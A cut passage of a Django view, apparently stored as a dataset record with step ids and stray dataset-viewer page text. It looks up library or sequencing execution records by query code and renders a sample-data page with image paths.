LibExecute.objects.filter(query_code=index):\r\n result = getpicture(LibExecute.objects.filter(query_code=index).first().upload_file.path)\r\n if result:\r\n for i in result:\r\n i = request.META.get(\"HTTP_HOST\") + i\r\n subject = LibExecute.objects.filter(query_code=index).first().libSubmit.subProject\r\n dataset = LibExecute.objects.filter(query_code=index).first().sampleinfolib_set.all()\r\n type = 2\r\n elif SeqExecute.objects.filter(query_code=index):\r\n subject = SeqExecute.objects.filter(query_code=index).first().seqSubmit.subProject\r\n dataset = SeqExecute.objects.filter(query_code=index).first().sampleinfoseq_set.all()\r\n type = 3\r\n return render(request, \"Showdata.html\", {\"data\": dataset, \"type\": type, \"subject\": subject})\r\n else:\r\n return render(request,\"Showdata.html\",{\"error\":msg})\r\n return render(request,\"Showdata.html\",{\"data\":dataset,\"type\":type,\"subject\":subject,\"pic\":result})",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.